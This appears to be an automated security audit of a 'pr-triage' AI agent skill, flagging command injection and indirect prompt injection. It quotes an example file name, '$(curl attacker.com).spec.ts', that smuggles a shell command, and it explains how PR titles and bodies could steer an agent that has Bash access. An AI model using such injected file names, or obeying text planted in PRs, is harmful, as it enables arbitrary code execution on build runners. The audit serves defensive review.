pr-triage
Warn
Audited by Gen Agent Trust Hub on Apr 7, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill dynamically constructs shell commands, such as
yarn vitest run src/{category}/{fn}.spec.ts, using file paths retrieved from external Pull Requests. An attacker could craft a PR with filenames containing shell metacharacters (e.g.,$(curl attacker.com).spec.ts) to execute arbitrary commands on the runner when the agent attempts to execute tests for those files.\n- [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection. It retrieves untrusted data from a PR's title and body via the GitHub CLI and provides this to the agent for classification and summarization. The agent has access to high-privilege tools likeBash, and the workflow lacks boundary markers to prevent the agent from obeying instructions embedded in the PR text.\n - Ingestion points: Untrusted data is ingested from the GitHub API using
gh pr view(title and body fields) inSKILL.md.\n - Boundary markers: No delimiters or instructions to ignore embedded commands are present in the prompt templates.\n
- Capability inventory: The agent has access to the
Bashtool and can run arbitrary code.\n - Sanitization: No sanitization is performed on external PR data or filenames before they are processed by the agent or used in shell commands.
Audit Metadata